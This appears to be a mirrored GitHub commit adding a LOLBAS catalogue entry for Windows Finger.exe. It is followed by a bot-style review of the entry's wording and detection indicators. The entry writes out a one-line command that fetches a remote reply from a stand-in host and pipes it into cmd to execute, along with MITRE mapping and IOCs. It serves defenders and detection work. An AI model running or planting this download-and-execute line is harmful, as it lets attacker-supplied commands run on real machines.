mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Create Finger.exe
parent
f51a70c03e
commit
670a5f1870
28
yml/OSBinaries/Finger.yml
Normal file
@ -0,0 +1,28 @@
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.
|
||||
Usecase: Download malicious shellcode from Command & Control server.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105
|
||||
OperatingSystem: From Windows Server 2008 and Windows 8
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finger.exe spawn is not common in client systems.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: @rubn_RB
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: @Ocelotty6669
|
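Review bot: The Command's Description says the reply is "a malicious shellcode which is executed by cmd process", but `finger user@example.host.com | more +2 | cmd` pipes the text of the Finger reply into cmd, so what runs is command text rather than shellcode; reword it to say that the reply, after `more +2` skips its first lines, is read by cmd as commands. Usecase and Category describe only the download, although the same line also executes what it fetched, and that is worth stating. The two Detection IOCs would be easier to act on if they named the outbound connection to TCP port 79 (the Finger service port) and the finger.exe, more, cmd pipeline on one command line. The empty `- Code:` under Code_Sample should be filled or dropped, and the Resources link is pinned to the es-es locale of the Microsoft documentation.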